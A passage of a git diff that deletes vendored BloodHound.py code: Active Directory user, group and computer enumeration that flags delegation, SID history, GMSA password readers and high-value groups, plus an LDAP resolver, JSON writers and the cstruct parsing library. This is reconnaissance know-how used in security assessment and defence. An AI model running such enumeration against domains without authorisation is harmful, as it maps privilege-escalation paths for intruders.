- props['sidhistory'] = ADUtils.get_entry_property(entry, 'sIDHistory', []) - - def enumerate_users(self): - filename = 'users.json' - - # Should we include extra properties in the query? - with_properties = 'objectprops' in self.collect - acl = 'acl' in self.collect - entries = self.addc.get_users(include_properties=with_properties, acl=acl) - - logging.debug('Writing users to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'users', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - # This loops over a generator, results are fetched from LDAP on the go - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - # Skip trust objects - if resolved_entry['type'] == 'trustaccount': - continue - user = { - "AllowedToDelegate": [], - "ObjectIdentifier": ADUtils.get_entry_property(entry, 'objectSid'), - "PrimaryGroupSid": MembershipEnumerator.get_primary_membership(entry), - "Properties": { - "name": resolved_entry['principal'], - "domain": self.addomain.domain.upper(), - "objectid": ADUtils.get_entry_property(entry, 'objectSid'), - "distinguishedname":ADUtils.get_entry_property(entry, 'distinguishedName'), - "highvalue": False, - "unconstraineddelegation": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000, - "passwordnotreqd": ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00000020 == 0x00000020 - }, - "Aces": [], - "SPNTargets": [], - "HasSIDHistory": [] - } - - if with_properties: - MembershipEnumerator.add_user_properties(user, entry) - if 'allowedtodelegate' in user['Properties']: - for host in user['Properties']['allowedtodelegate']: - try: - target = host.split('/')[1] - except IndexError: - logging.warning('Invalid delegation 
target: %s', host) - continue - try: - sid = self.addomain.computersidcache.get(target.lower()) - user['AllowedToDelegate'].append(sid) - except KeyError: - if '.' in target: - user['AllowedToDelegate'].append(target.upper()) - # Parse SID history - if len(user['Properties']['sidhistory']) > 0: - for historysid in user['Properties']['sidhistory']: - user['HasSIDHistory'].append(self.aceresolver.resolve_binary_sid(historysid)) - - # If this is a GMSA, process it's ACL. We don't bother with threads/processes here - # since these accounts shouldn't be that common and neither should they have very complex - # DACLs which control who can read their password - if ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', default=b'', raw=True) != b'': - self.parse_gmsa(user, entry) - - self.addomain.users[entry['dn']] = resolved_entry - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(user, 'user', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(user) - - # If we are parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - 
self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing users') - - def enumerate_groups(self): - - highvalue = ["S-1-5-32-544", "S-1-5-32-550", "S-1-5-32-549", "S-1-5-32-551", "S-1-5-32-548"] - - def is_highvalue(sid): - if sid.endswith("-512") or sid.endswith("-516") or sid.endswith("-519") or sid.endswith("-520"): - return True - if sid in highvalue: - return True - return False - - # Should we include extra properties in the query? - with_properties = 'objectprops' in self.collect - acl = 'acl' in self.collect - - filename = 'groups.json' - entries = self.addc.get_groups(include_properties=with_properties, acl=acl) - - logging.debug('Writing groups to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'groups', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - self.addomain.groups[entry['dn']] = resolved_entry - try: - sid = entry['attributes']['objectSid'] - except KeyError: - #Somehow we found a group without a sid? 
- logging.warning('Could not determine SID for group %s', entry['attributes']['distinguishedName']) - continue - group = { - "ObjectIdentifier": sid, - "Properties": { - "domain": self.addomain.domain.upper(), - "objectid": sid, - "highvalue": is_highvalue(sid), - "name": resolved_entry['principal'], - "distinguishedname": ADUtils.get_entry_property(entry, 'distinguishedName') - }, - "Members": [], - "Aces": [] - } - if sid in ADUtils.WELLKNOWN_SIDS: - # Prefix it with the domain - group['ObjectIdentifier'] = '%s-%s' % (self.addomain.domain.upper(), sid) - group['Properties']['objectid'] = group['ObjectIdentifier'] - if with_properties: - group['Properties']['admincount'] = ADUtils.get_entry_property(entry, 'adminCount', default=0) == 1 - group['Properties']['description'] = ADUtils.get_entry_property(entry, 'description') - - for member in entry['attributes']['member']: - resolved_member = self.get_membership(member) - if resolved_member: - group['Members'].append(resolved_member) - - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(group, 'group', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(group) - - self.write_default_groups() - - # If we are 
parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing groups') - - def enumerate_computers_dconly(self): - ''' - Enumerate computer objects. This function is only used if no - collection was requested that required connecting to computers anyway. - ''' - filename = 'computers.json' - - acl = 'acl' in self.collect - entries = self.addc.ad.computers - - logging.debug('Writing computers ACL to file: %s', filename) - - # Use a separate queue for processing the results - self.result_q = queue.Queue() - results_worker = threading.Thread(target=OutputWorker.membership_write_worker, args=(self.result_q, 'computers', filename)) - results_worker.daemon = True - results_worker.start() - - if acl and not self.disable_pooling: - self.aclenumerator.init_pool() - - # This loops over the cached entries - for entry in entries: - if not 'attributes' in entry: - continue - - if 'dNSHostName' not in entry['attributes']: - continue - - hostname = entry['attributes']['dNSHostName'] - if not hostname: - continue - samname = entry['attributes']['sAMAccountName'] - - cobject = ADComputer(hostname=hostname, samname=samname, ad=self.addomain, addc=self.addc, objectsid=entry['attributes']['objectSid']) - cobject.primarygroup = MembershipEnumerator.get_primary_membership(entry) - computer = cobject.get_bloodhound_data(entry, self.collect, skip_acl=True) - - # If we are enumerating ACLs, we break out of the loop here - # this is because parsing ACLs is computationally heavy and therefor is done in subprocesses - if acl: - if self.disable_pooling: - # Debug mode, don't run this pooled since it hides exceptions - self.process_acldata(parse_binary_acl(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), 
self.addc.objecttype_guid_map)) - else: - # Process ACLs in separate processes, then call the processing function to resolve entries and write them to file - self.aclenumerator.pool.apply_async(parse_binary_acl, args=(computer, 'computer', ADUtils.get_entry_property(entry, 'nTSecurityDescriptor', raw=True), self.addc.objecttype_guid_map), callback=self.process_acldata) - else: - # Write it to the queue -> write to file in separate thread - # this is solely for consistency with acl parsing, the performance improvement is probably minimal - self.result_q.put(computer) - - # If we are parsing ACLs, close the parsing pool first - # then close the result queue and join it - if acl and not self.disable_pooling: - self.aclenumerator.pool.close() - self.aclenumerator.pool.join() - self.result_q.put(None) - else: - self.result_q.put(None) - self.result_q.join() - - logging.debug('Finished writing computers') - - def parse_gmsa(self, user, entry): - """ - Parse GMSA DACL which states which users can read the password - """ - _, aces = parse_binary_acl(user, 'user', ADUtils.get_entry_property(entry, 'msDS-GroupMSAMembership', raw=True), self.addc.objecttype_guid_map) - processed_aces = self.aceresolver.resolve_aces(aces) - for ace in processed_aces: - if ace['RightName'] == 'Owner': - continue - ace['RightName'] = 'ReadGMSAPassword' - user['Aces'].append(ace) - - def process_acldata(self, result): - """ - Process ACLs that resulted from parsing with cstruct - """ - data, aces = result - # Parse aces - data['Aces'] += self.aceresolver.resolve_aces(aces) - self.result_q.put(data) - - def write_default_groups(self): - """ - Put default groups in the groups.json file - """ - - # Domain controllers - rootdomain = self.addc.get_root_domain().upper() - entries = self.addc.get_domain_controllers() - - group = { - "ObjectIdentifier": "%s-S-1-5-9" % rootdomain, - "Properties": { - "domain": rootdomain.upper(), - "name": "ENTERPRISE DOMAIN CONTROLLERS@%s" % rootdomain, - }, - "Members": 
[], - "Aces": [] - } - for entry in entries: - resolved_entry = ADUtils.resolve_ad_entry(entry) - memberdata = { - "MemberId": resolved_entry['objectid'], - "MemberType": resolved_entry['type'].capitalize() - } - group["Members"].append(memberdata) - self.result_q.put(group) - - domainsid = self.addomain.domain_object.sid - domainname = self.addomain.domain.upper() - - # Everyone - evgroup = { - "ObjectIdentifier": "%s-S-1-1-0" % domainname, - "Properties": { - "domain": domainname, - "name": "EVERYONE@%s" % domainname, - }, - "Members": [ - { - "MemberId": "%s-515" % domainsid, - "MemberType": "Group" - }, - { - "MemberId": "%s-513" % domainsid, - "MemberType": "Group" - } - ], - "Aces": [] - } - self.result_q.put(evgroup) - - # Authenticated users - augroup = { - "ObjectIdentifier": "%s-S-1-5-11" % domainname, - "Properties": { - "domain": domainname, - "name": "AUTHENTICATED USERS@%s" % domainname, - }, - "Members": [ - { - "MemberId": "%s-515" % domainsid, - "MemberType": "Group" - }, - { - "MemberId": "%s-513" % domainsid, - "MemberType": "Group" - } - ], - "Aces": [] - } - self.result_q.put(augroup) - - - def enumerate_memberships(self): - """ - Run appropriate enumeration tasks - """ - self.enumerate_users() - self.enumerate_groups() - if not ('localadmin' in self.collect - or 'session' in self.collect - or 'loggedon' in self.collect - or 'experimental' in self.collect): - self.enumerate_computers_dconly() diff --git a/external/bloodhound/enumeration/objectresolver.py b/external/bloodhound/enumeration/objectresolver.py deleted file mode 100755 index b8535e3..0000000 --- a/external/bloodhound/enumeration/objectresolver.py +++ /dev/null @@ -1,151 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, 
copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -import logging -import threading -from ldap3.utils.conv import escape_filter_chars -from . .ad.utils import ADUtils - -class ObjectResolver(object): - """ - This class is responsible for resolving objects. This can be for example sAMAccountNames which - should be resolved in the GC to see which domain they belong to, or SIDs which have to be - resolved somewhere else. This resolver is thread-safe. - """ - def __init__(self, addomain, addc): - self.addomain = addomain - self.addc = addc - self.lock = threading.Lock() - - def resolve_distinguishedname(self, distinguishedname, use_gc=True): - """ - Resolve a DistinguishedName in LDAP. 
This will use the GC by default - Returns a single LDAP entry - """ - with self.lock: - if use_gc and not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if not use_gc and not self.addc.resolverldap: - if not self.addc.ldap_connect(resolver=True): - # Error connecting, bail - return None - if use_gc: - logging.debug('Querying GC for DN %s', distinguishedname) - else: - logging.debug('Querying resolver LDAP for DN %s', distinguishedname) - distinguishedname = self.addc.ldap_get_single(distinguishedname, use_gc=use_gc, use_resolver=True) - return distinguishedname - - def resolve_samname(self, samname, use_gc=True): - """ - Resolve a SAM name in the GC. This can give multiple results. - Returns a list of LDAP entries - """ - out = [] - safename = escape_filter_chars(samname) - with self.lock: - if not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if use_gc: - logging.debug('Querying GC for SAM Name %s', samname) - else: - logging.debug('Querying LDAP for SAM Name %s', samname) - entries = self.addc.search(search_base="", - search_filter='(sAMAccountName=%s)' % safename, - use_gc=use_gc, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType', 'objectSid']) - # This uses a generator, however we return a list - for entry in entries: - out.append(entry) - - return out - - def resolve_upn(self, upn): - """ - Resolve a UserPrincipalName in the GC. 
- Returns a single LDAP entry - """ - safename = escape_filter_chars(upn) - with self.lock: - if not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - logging.debug('Querying GC for UPN %s', upn) - entries = self.addc.search(search_base="", - search_filter='(&(objectClass=user)(userPrincipalName=%s))' % safename, - use_gc=True, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType', 'objectSid']) - for entry in entries: - # By definition this can be only one entry - return entry - - def resolve_sid(self, sid, use_gc=True): - """ - Resolve a SID in LDAP. This will use the GC by default - Returns a single LDAP entry - """ - with self.lock: - if use_gc and not self.addc.gcldap: - if not self.addc.gc_connect(): - # Error connecting, bail - return None - if not use_gc and not self.addc.resolverldap: - if not self.addc.ldap_connect(resolver=True): - # Error connecting, bail - return None - if use_gc: - base = "" - logging.debug('Querying GC for SID %s', sid) - else: - logging.debug('Querying resolver LDAP for SID %s', sid) - base = None - entries = self.addc.search(search_base=base, - search_filter='(objectSid=%s)' % sid, - use_gc=use_gc, - use_resolver=True, - attributes=['sAMAccountName', 'distinguishedName', 'sAMAccountType']) - for entry in entries: - return entry - - def gc_sam_lookup(self, samname): - """ - This function attempts to resolve the SAM name returned in session enumeration to - a user/domain combination by querying the Global Catalog. - SharpHound calls this GC Deconflictation. 
- """ - output = [] - entries = self.resolve_samname(samname) - # If an error occurs, return - if entries is None: - return - if len(entries) > 0: - for entry in entries: - output.append(entry['attributes']['objectSid']) - else: - logging.warning('Failed to resolve SAM name %s in current forest', samname) - return output diff --git a/external/bloodhound/enumeration/outputworker.py b/external/bloodhound/enumeration/outputworker.py deleted file mode 100755 index 34ef92a..0000000 --- a/external/bloodhound/enumeration/outputworker.py +++ /dev/null @@ -1,110 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import traceback -import codecs -import json - -class OutputWorker(object): - @staticmethod - def write_worker(result_q, computers_filename): - """ - Worker to write the results from the results_q to the given files. 
- """ - computers_out = codecs.open(computers_filename, 'w', 'utf-8') - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Write start of the json file - computers_out.write('{"computers":[') - num_computers = 0 - while True: - obj = result_q.get() - - if obj is None: - logging.debug('Write worker obtained a None value, exiting') - break - - objtype, data = obj - if objtype == 'computer': - if num_computers != 0: - computers_out.write(',') - json.dump(data, computers_out, indent=indent_level) - num_computers += 1 - else: - logging.warning("Type is %s this should not happen", objtype) - - result_q.task_done() - - logging.debug('Write worker is done, closing files') - # Write metadata manually - computers_out.write('],"meta":{"type":"computers","count":%d, "version":3}}' % num_computers) - computers_out.close() - result_q.task_done() - - @staticmethod - def membership_write_worker(result_q, enumtype, filename): - """ - Worker to write the results from the results_q to the given file. 
- This is for both users and groups - """ - try: - membership_out = codecs.open(filename, 'w', 'utf-8') - except: - logging.warning('Could not write file: %s', filename) - result_q.task_done() - return - - # If the logging level is DEBUG, we ident the objects - if logging.getLogger().getEffectiveLevel() == logging.DEBUG: - indent_level = 1 - else: - indent_level = None - - # Write start of the json file - membership_out.write('{"%s":[' % enumtype) - num_members = 0 - while True: - data = result_q.get() - - if data is None: - break - - if num_members != 0: - membership_out.write(',') - json.dump(data, membership_out, indent=indent_level) - num_members += 1 - - result_q.task_done() - - logging.info('Found %d %s', num_members, enumtype) - # Write metadata manually - membership_out.write('],"meta":{"type":"%s","count":%d, "version":3}}' % (enumtype, num_members)) - membership_out.close() - result_q.task_done() diff --git a/external/bloodhound/lib/__init__.py b/external/bloodhound/lib/__init__.py deleted file mode 100755 index 930acf9..0000000 --- a/external/bloodhound/lib/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -from . 
.lib.cstruct import ( - cstruct, - ctypes, - dumpstruct, - hexdump, - Instance, - PointerInstance, - Parser, - RawType, - BaseType, - Error, - ParserError, - CompilerError, - ResolveError, - NullPointerDereference, -) - -__all__ = [ - "cstruct", - "ctypes", - "dumpstruct", - "hexdump", - "Instance", - "PointerInstance", - "Parser", - "RawType", - "BaseType", - "Error", - "ParserError", - "CompilerError", - "ResolveError", - "NullPointerDereference", -] diff --git a/external/bloodhound/lib/cstruct.py b/external/bloodhound/lib/cstruct.py deleted file mode 100755 index 3314e40..0000000 --- a/external/bloodhound/lib/cstruct.py +++ /dev/null @@ -1,1894 +0,0 @@ -# Copyright (c) 2018 Fox-IT Security Research Team -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. - -# TODO: -# - Rework definition parsing, maybe pycparser? -# - Change expression implementation -# - Lazy reading? 
-from __future__ import print_function -import re -import sys -import ast -import pprint -import string -import struct -import ctypes as _ctypes -from io import BytesIO -from collections import OrderedDict - -try: - from builtins import bytes as newbytes -except ImportError: - newbytes = bytes - -PY3 = sys.version_info > (3,) -if PY3: - long = int - xrange = range - -DEBUG = False - -COLOR_RED = '\033[1;31m' -COLOR_GREEN = '\033[1;32m' -COLOR_YELLOW = '\033[1;33m' -COLOR_BLUE = '\033[1;34m' -COLOR_PURPLE = '\033[1;35m' -COLOR_CYAN = '\033[1;36m' -COLOR_WHITE = '\033[1;37m' -COLOR_NORMAL = '\033[1;0m' - -COLOR_BG_RED = '\033[1;41m\033[1;37m' -COLOR_BG_GREEN = '\033[1;42m\033[1;37m' -COLOR_BG_YELLOW = '\033[1;43m\033[1;37m' -COLOR_BG_BLUE = '\033[1;44m\033[1;37m' -COLOR_BG_PURPLE = '\033[1;45m\033[1;37m' -COLOR_BG_CYAN = '\033[1;46m\033[1;37m' -COLOR_BG_WHITE = '\033[1;47m\033[1;30m' - -PRINTABLE = string.digits + string.ascii_letters + string.punctuation + " " - -COMPILE_TEMPL = """ -class {name}(Structure): - def __init__(self, cstruct, structure, source=None): - self.structure = structure - self.source = source - super({name}, self).__init__(cstruct, structure.name, structure.fields) - - def _read(self, stream): - r = OrderedDict() - sizes = {{}} - bitreader = BitBuffer(stream, self.cstruct.endian) - -{read_code} - - return Instance(self, r, sizes) - - def add_fields(self, name, type_, offset=None): - raise NotImplementedError("Can't add fields to a compiled structure") - - def __repr__(self): - return '' -""" - - -class Error(Exception): - pass - - -class ParserError(Error): - pass - - -class CompilerError(Error): - pass - - -class ResolveError(Error): - pass - - -class NullPointerDereference(Error): - pass - - -def log(line, *args, **kwargs): - if not DEBUG: - return - - print(line.format(*args, **kwargs), file=sys.stderr) - - -class cstruct(object): - """Main class of cstruct. All types are registered in here. 
- - Args: - endian: The endianness to use when parsing. - pointer: The pointer type to use for Pointers. - """ - - DEF_CSTYLE = 1 - - def __init__(self, endian='<', pointer='uint64'): - self.endian = endian - - self.consts = {} - self.lookups = {} - self.typedefs = { - 'byte': 'int8', - 'ubyte': 'uint8', - 'uchar': 'uint8', - 'short': 'int16', - 'ushort': 'uint16', - 'long': 'int32', - 'ulong': 'uint32', - 'ulong64': 'uint64', - - 'u1': 'uint8', - 'u2': 'uint16', - 'u4': 'uint32', - 'u8': 'uint64', - - 'word': 'uint16', - 'dword': 'uint32', - - 'longlong': 'int64', - 'ulonglong': 'uint64', - - 'int': 'int32', - 'unsigned int': 'uint32', - - 'int8': PackedType(self, 'int8', 1, 'b'), - 'uint8': PackedType(self, 'uint8', 1, 'B'), - 'int16': PackedType(self, 'int16', 2, 'h'), - 'uint16': PackedType(self, 'uint16', 2, 'H'), - 'int32': PackedType(self, 'int32', 4, 'i'), - 'uint32': PackedType(self, 'uint32', 4, 'I'), - 'int64': PackedType(self, 'int64', 8, 'q'), - 'uint64': PackedType(self, 'uint64', 8, 'Q'), - 'float': PackedType(self, 'float', 4, 'f'), - 'double': PackedType(self, 'double', 8, 'd'), - 'char': CharType(self), - 'wchar': WcharType(self), - - 'int24': BytesInteger(self, 'int24', 3, True), - 'uint24': BytesInteger(self, 'uint24', 3, False), - 'int48': BytesInteger(self, 'int48', 6, True), - 'uint48': BytesInteger(self, 'uint48', 6, False), - - 'void': VoidType(), - } - - self.pointer = self.resolve(pointer) - - def addtype(self, name, t, replace=False): - """Add a type or type reference. - - Args: - name: Name of the type to be added. - t: The type to be added. Can be a str reference to another type - or a compatible type class. - - Raises: - ValueError: If the type already exists. 
- """ - name = name.lower() - if not replace and name.lower() in self.typedefs: - raise ValueError("Duplicate type: %s" % name) - - self.typedefs[name] = t - - def load(self, s, deftype=None, **kwargs): - """Parse structures from the given definitions using the given definition type. - - Definitions can be parsed using different parsers. Currently, there's - only one supported parser - DEF_CSTYLE. Parsers can add types and - modify this cstruct instance. Arguments can be passed to parsers - using kwargs. - - Args: - s: The definition to parse. - deftype: The definition type to parse the definitions with. - **kwargs: Keyword arguments for parsers. - """ - deftype = deftype or cstruct.DEF_CSTYLE - - if deftype == cstruct.DEF_CSTYLE: - parser = CStyleParser(self, **kwargs) - - parser.parse(s) - - def loadfile(self, s, deftype=None, **kwargs): - """Load structure definitions from a file. - - The given path will be read and parsed using the .load() function. - - Args: - s: The path to load definitions from. - deftype: The definition type to parse the definitions with. - **kwargs: Keyword arguments for parsers. - """ - with open(s, 'r') as fh: - self.load(fh.read(), deftype, **kwargs) - - def read(self, name, s): - """Parse data using a given type. - - Args: - name: Type name to read. - s: File-like object or byte string to parse. - - Returns: - The parsed data. - """ - return self.resolve(name).read(s) - - def resolve(self, name): - """Resolve a type name to get the actual type object. - - Types can be referenced using different names. When we want - the actual type object, we need to resolve these references. - - Args: - name: Type name to resolve. - - Returns: - The resolved type object. - - Raises: - ResolveError: If the type can't be resolved. 
- """ - t = name - if not isinstance(t, str): - return t - - for i in xrange(10): - if t.lower() not in self.typedefs: - raise ResolveError("Unknown type %s" % name) - - t = self.typedefs[t.lower()] - - if not isinstance(t, str): - return t - - raise ResolveError("Recursion limit exceeded while resolving type %s" % name) - - def __getattr__(self, attr): - if attr.lower() in self.typedefs: - return self.typedefs[attr.lower()] - - if attr in self.consts: - return self.consts[attr] - - raise AttributeError("Invalid Attribute: %s" % attr) - - -class Parser(object): - """Base class for definition parsers. - - Args: - cstruct: An instance of cstruct. - """ - - def __init__(self, cstruct): - self.cstruct = cstruct - - def parse(self, data): - """This function should parse definitions to cstruct types. - - Args: - data: Data to parse definitions from, usually a string. - """ - raise NotImplementedError() - - -class CStyleParser(Parser): - """Definition parser for C-like structure syntax. - - Args: - cstruct: An instance of cstruct - compiled: Whether structs should be compiled or not. 
- """ - - def __init__(self, cstruct, compiled=True): - self.compiled = compiled - super(CStyleParser, self).__init__(cstruct) - - # TODO: Implement proper parsing - def parse(self, data): - self._constants(data) - self._enums(data) - self._structs(data) - self._lookups(data, self.cstruct.consts) - - def _constants(self, data): - r = re.finditer(r'#define\s+(?P[^\s]+)\s+(?P[^\r\n]+)\s*\n', data) - for t in r: - d = t.groupdict() - v = d['value'].rsplit('//')[0] - - try: - v = ast.literal_eval(v) - except (ValueError, SyntaxError): - pass - - self.cstruct.consts[d['name']] = v - - def _enums(self, data): - r = re.finditer( - r'enum\s+(?P[^\s:{]+)\s*(:\s*(?P[^\s]+)\s*)?\{(?P[^}]+)\}\s*;', - data, - ) - for t in r: - d = t.groupdict() - - nextval = 0 - values = {} - for line in d['values'].split('\n'): - line, sep, comment = line.partition("//") - for v in line.split(","): - key, sep, val = v.partition("=") - key = key.strip() - val = val.strip() - if not key: - continue - if not val: - val = nextval - else: - val = Expression(self.cstruct, val).evaluate({}) - - nextval = val + 1 - - values[key] = val - - if not d['type']: - d['type'] = 'uint32' - - enum = Enum( - self.cstruct, d['name'], self.cstruct.resolve(d['type']), values - ) - self.cstruct.addtype(enum.name, enum) - - def _structs(self, data): - compiler = Compiler(self.cstruct) - r = re.finditer( - r'(#(?P(?:compile))\s+)?((?Ptypedef)\s+)?(?P[^\s]+)\s+(?P[^\s]+)?(?P\s*\{[^}]+\}(?P\s+[^;\n]+)?)?\s*;', - data, - ) - for t in r: - d = t.groupdict() - - if d['name']: - name = d['name'] - elif d['defs']: - name = d['defs'].strip().split(',')[0].strip() - else: - raise ParserError("No name for struct") - - if d['type'] == 'struct': - data = self._parse_fields(d['fields'][1:-1].strip()) - st = Structure(self.cstruct, name, data) - if d['flags'] == 'compile' or self.compiled: - st = compiler.compile(st) - elif d['typedef'] == 'typedef': - st = d['type'] - else: - continue - - if d['name']: - 
self.cstruct.addtype(d['name'], st) - - if d['defs']: - for td in d['defs'].strip().split(','): - td = td.strip() - self.cstruct.addtype(td, st) - - def _parse_fields(self, s): - fields = re.finditer( - r'(?P[^\s]+)\s+(?P[^\s\[:]+)(\s*:\s*(?P\d+))?(\[(?P[^;\n]*)\])?;', - s, - ) - r = [] - for f in fields: - d = f.groupdict() - if d['type'].startswith('//'): - continue - - type_ = self.cstruct.resolve(d['type']) - - d['name'] = d['name'].replace('(', '').replace(')', '') - - # Maybe reimplement lazy type references later - # _type = TypeReference(self, d['type']) - if d['count'] is not None: - if d['count'] == '': - count = None - else: - count = Expression(self.cstruct, d['count']) - try: - count = count.evaluate() - except Exception: - pass - - type_ = Array(self.cstruct, type_, count) - - if d['name'].startswith('*'): - d['name'] = d['name'][1:] - type_ = Pointer(self.cstruct, type_) - - field = Field(d['name'], type_, int(d['bits']) if d['bits'] else None) - r.append(field) - - return r - - def _lookups(self, data, consts): - r = re.finditer(r'\$(?P[^\s]+) = ({[^}]+})\w*\n', data) - - for t in r: - d = ast.literal_eval(t.group(2)) - self.cstruct.lookups[t.group(1)] = dict( - [(self.cstruct.consts[k], v) for k, v in d.items()] - ) - - -class Instance(object): - """Holds parsed structure data.""" - - def __init__(self, type_, values, sizes=None): - object.__setattr__(self, '_type', type_) - object.__setattr__(self, '_values', values) - object.__setattr__(self, '_sizes', sizes) - - def write(self, fh): - """Write this structure to a writable file-like object. - - Args: - fh: File-like objects that supports writing. - - Returns: - The amount of bytes written. - """ - return self.__dict__['_type'].write(fh, self) - - def dumps(self): - """Dump this structure to a byte string. - - Returns: - The raw bytes of this structure. 
